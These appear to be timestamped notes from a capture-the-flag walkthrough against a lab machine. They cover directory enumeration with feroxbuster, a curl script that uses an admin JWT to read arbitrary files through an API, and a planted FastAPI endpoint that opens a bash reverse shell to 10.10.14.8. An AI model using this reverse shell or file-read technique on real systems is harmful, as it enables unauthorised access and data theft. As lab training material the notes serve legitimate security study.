You need to read python codes and find where the files are.
Fun Box!
Now I’m using a sever with 4GB memory, as 2GB memory is not enough.
I wonder how much aws w charge me…
00:24 feroxbuster
I ran feroxbuster and dirb.
Feroxbuster showed results before dirb did, so I canceled dirb.
feroxbuster | Kali Linux Tools
sudo apt install feroxbuster
feroxbuster -u http://10.10.11.162 --force-recursion -C 404,405 -m GET,POST
./feroxbuster -u http://10.10.11.162 -H Accept:application/json "Authorization: Bearer {token}"
curl https://10.10.11.162
-H "Accept: application/json"
-H "Authorization: Bearer {token}"
04:45 get_file.sh
Encode input filename to base64, then exec curl command.
#!/bin/bash
JWTTOKEN=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0eXBlIjoiYWNjZXNzX3Rva2VuIiwiZXhwIjoxNjYxNDc0MjAyLCJpYXQiOjE2NjA3ODMwMDIsInN1YiI6IjEyIiwiaXNfc3VwZXJ1c2VyIjp0cnVlLCJndWlkIjoiNmUwM2MyM2EtMjYyNy00ZWY0LWI0M2QtNWMyY2Q3ZGJmOWM0In0.bxxO2p3VQGpHFfeK7lLAOmJNBo_gzf8otN1--BhKQCw
base64_url=$(echo -n $1 | base64 | tr '/+' '_-' | tr -d '=')
curl -s http://10.10.11.162/api/v1/admin/file/${base64_url} -H "Authorization: bearer $JWTTOKEN" | jq .file -r
+ and / are special chars, so replace them with _ and – like below.
echo -n "6+6is_f/ine-T" | tr '/+' '_-'
6-6is_f_ine-T
Then trim = in the end.
jq makes json return readable.
.file option takes only file element. -r removes ¥n . reference
06:30 JSON escape
Free Online JSON Escape / Unescape Tool - FreeFormatter.com
A free online tool to escape or unescape JSON strings
06:38 Prepare script to send user.py
@router.delete("/ReverseShell", status_code=200 )
def exe_reverse( ) -> Any:
"""
exec reverse shell
"""
import os
os.system("bash -c 'bash -i >& /dev/tcp/10.10.14.8/1234 0>&1'")
return
@router.get did not work. I guess get expects some outputs. Then put should expect inputs etc. Delete was the right one.
07:18 sudo -l & PAM-Wordle
find / 2>/dev/null | grep wordle